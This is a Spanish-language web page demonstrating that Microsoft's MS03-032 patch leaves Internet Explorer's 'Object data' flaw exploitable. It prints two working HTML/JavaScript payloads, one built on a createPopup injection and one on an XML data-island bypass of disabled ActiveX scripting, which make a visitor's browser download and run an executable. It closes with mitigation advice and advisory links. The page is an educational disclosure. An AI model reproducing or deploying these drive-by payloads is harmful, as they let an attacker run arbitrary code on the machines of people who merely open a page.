Demostracin del fallo "Object data" del Internet Explorer MS03-032


Debido a que la gente de Microsoft una vez mas ha cometido un grave error, el parche MS03-032 que en un principio fue publicado para solventar este problema, ha resultado ser totalmente intil, puesto que con pequeas variantes, el fallo sigue existiendo.

En las siguientes demostraciones se ejecutar y descargar en "c:\" un archivo llamado "fuego.exe", que es totalmente inofensivo, para cerrarlo slo tienes que pulsar "Esc"

La explicacin completa sobre cmo reproducir el fallo ser publicada cuando exista una solucin definitiva al problema.

Ejemplo 1: Slo funcionar si tenemos la "Secuencia de comandos ActiveX" activada.

Este ejemplo se basa en el cdigo original, que publico el grupo Eyee.
El cdigo es este:
<script>
&nbspvar oPopup = window.createPopup();
  &nbspfunction showPopup() {
  &nbspoPopup.document.body.innerHTML = "<object data=fuego.php>";
  &nbspoPopup.show(0,0,1,1,document.body);
 }
&nbspshowPopup()
</script>

Lanzar el ejemplo 1 aqui

Ejemplo 2: Funcionar aunque desactivemos la "Secuencia de comandos ActiveX".

Esta modificacin se basa en un script de GreyMagic de febrero del 2002 en el cual se demuestra la forma de ejecutar comandos sin utilizar Active Scripting o ActiveX.
sta es la direccin de aquel anuncio: http://greymagic.com/adv/gm001-ie/
El cdigo quedara as:
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
  <security>
    <exploit>
      <![CDATA[
      <object id="oFile" data="fuego.php"></object>
      ]]>
    </exploit>
  </security>
</xml>

Lanzar el ejemplo 2 aqui


Para evitar el ataque del primer ejemplo debemos desactivar la "Secuencia de comandos ActiveX", esto se hace en :

Internet Explorer>>Herramientas>>Opciones de Internet,>>Seguridad>> Nivel personalizado>>Secuencias de comandos ActiveX>>Descativar

Aunque personalmente no creo que desactivar los ActiveX sea una solucin puesto que sin los activeX no podremos acceder a muchas de las webs, y como veomos con el segundo ejemplo, no sirve de nada desactivarlos.

Para evitar el ataque del segundo ejemplo, debemos desactivar los controles ActiveX , esto se hace en :

Internet Explorer>>Herramientas>>Opciones de Internet>>Seguridad>> Nivel personalizado>>Controles y complementos de ActiveX>>Ejecutar controles y complementos de ActiveX>>Desactivar.

Si la solucin anterior no era buena, sta es peor, tampoco te la recomiendo.

A falta del parche definitivo de Microsoft, lo mas conveniente es tener instalado un buen antivirus y un buen firewall. Muchos antivirus detectarn el script que trata de descargar el ejecutable en tu mquina. En caso de que se descargue un virus, lo detectarn cuando se trate de ejecutar, y si se trata de un programa tipo troyano, podemos pararlo con el firewall.

Por supuesto mucho mejor que todo esto es utilizar otro navegador, cualquiera menos el Internet Explorer :)

 

Links

Aviso original: http://www.eeye.com/html/Research/Advisories/AD20030820.html
Parche fallido de Microsoft (MS03-032): http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-032.asp
Informacin y ejemplos en espaol (Hispasec): http://www.hispasec.com/unaaldia/1778

Texto publicado en:

http://cyruxnet.com.ar
ATENCIN !!
Puedes copiar y distribuir este texto siempre y cuando no lo modifiques y menciones la fuente.

Este texto est hecho con intencin didctica, no nos hacemos responsables del mal uso que se haga de lo aqu explicado
